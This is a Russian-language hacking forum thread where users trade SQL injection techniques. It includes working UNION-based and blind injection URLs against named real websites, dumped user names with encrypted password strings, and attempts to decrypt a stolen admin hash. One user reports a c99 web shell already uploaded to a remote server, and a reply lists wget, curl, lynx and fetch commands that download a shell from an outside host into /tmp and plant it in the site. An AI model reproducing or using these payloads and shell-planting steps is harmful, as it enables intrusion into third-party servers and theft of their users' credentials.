[0]:webmaster:њyЯu›И§ [1]:administrator:џЊ6г–А¶Ґ2И [2]:morogoy:¶pР [3]:dorogoynn:Эxi›лPcх [4]:anna:NЂ—оB7е [5]:dorogoy:Уќ=цКі¶э ѓ вывожу из 5й ветки базы он мне вот такое дело выдает в чем беда? как исправить?
попробуй AES_DECRYPT(AES_ENCRYPT( хотя, судя по всему ты юзал СИПТ, и там по умолчанию крипт. еще варианты: PHP: cast(Version()+as+binary) CONVERT(Version(),binary) convert(version()+using+latin1) convert(version()+using+binary)
да я и unhex(hex()) не помогает а юзал я да сипт я уж и руками пробовал $n@ke перепробовал все ничего не помогло все так же осталось еще у кого нито варианты будут?
Будут Это скорее всего AES_ENCRYPT НО что-бы расшифровать нужен ключ. Тоесь пароли попросту зашифрованы Узнать ключ и расшифровать. А лучше алгоритм, тк. может быть и самопис, визуально не поймёшь
http://www.mysql.ru/docs/man/Miscellaneous_functions.html AES_ENCRYPT AES_DECRYPT Посмотри, думаю всё станет понятно
Помогите... http://www.aftech.ru/about/news/?nid=999999+UNION+SELECT+1,222,3,4,5,6,7,8,9-- Unknown column 'news_datetime' in 'order clause' Как это обойти?
Code: http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1))%3E1--
Все выводится http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,column_name,9+from+information_schema.columns--+ http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,table_schema,9+from+information_schema.columns--+ password -> 0x70617373776F7264 http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,table_name,9+from+information_schema.columns+where+column_name=0x70617373776F7264--+ phpads_users site Users
Пиплы,вопрос! Залил c99 на удалённый сервак.Захожу в Sec - показывается только функция /etc/passwd.Пытаюсь аплоаднуть другой шелл в другую директорию,доступную на запись - фигли.Меня кидает обратно на диру,куда я залил шелл(/download).Чем вызвана эта болезнь ? Также интересует причина возникновения *чёрных пятен*,а точнее,огромного тёмного экрана вместо исходного кода рнр скрипта.Проблема возникает при попытке просмотреть исходный код.Права для гостей(в том числе,и для меня,хоть я и отношусь к группе www на сервере),есть ТОЛЬКО права на чтение,но я ведь и не собираюсь запускать скрипт,а лишь только глянуть его исходник.У кого какие мысли ?
Что самое интересное,так это то,что права,выставленные на фаил,не влияют))).Фаил тупо не грузится и всё тут - чёрный экран.(проверял на фаилах с правами 777)
ну дык как загрузил шелл - так и грузани его с тем именем и в ту папку, в которую ты хотел бы. Или не шелл, а что ты там хотел. Чо тут думать. Плюс попробуй загрузить что угодно (не обязательно шелл) в папку /tmp ,как через choose, так и так вот: 1. lynx -source "http://site/shell.txt" > /tmp/shell.php 2. links -source "http://site/shell.txt" > /tmp/shell.php 3. wget -o /tmp/shell.php http://site/shell.txt 4. GET http://site/shell.txt > /tmp/shell.php 5. fetch -o shell.php http://site/shell.txt 6. curl --output shell.php http://site/shell.txt а потом: cp /tmp/shell.php /абсолютный_путь/папка/новое_название_шелла ЗЫЖ Или сразу "cp"
Есть 2 вопроса: 1) Про внедрение в иньекцию UPDATE. Пробовал на различных серваках так: Если вывод ошибок не отключен, то пишет что ошибка в синтаксесе. Тоже не срабатывает И даже такие запросы почему то не проходят. Поясните пожалуйста. Я понимаю если бы писало нет привелегий. У кго ибудь получалось значения в таблицах менять? Буду очень рад примеру 2) Вопрос. Получил пароль админа В таблице с юзерами есть поле salt но оно у всех пустое. Походу подсаливание не задействовано. Как то зашифрован. Зарегал своего юзера Как расшифровать????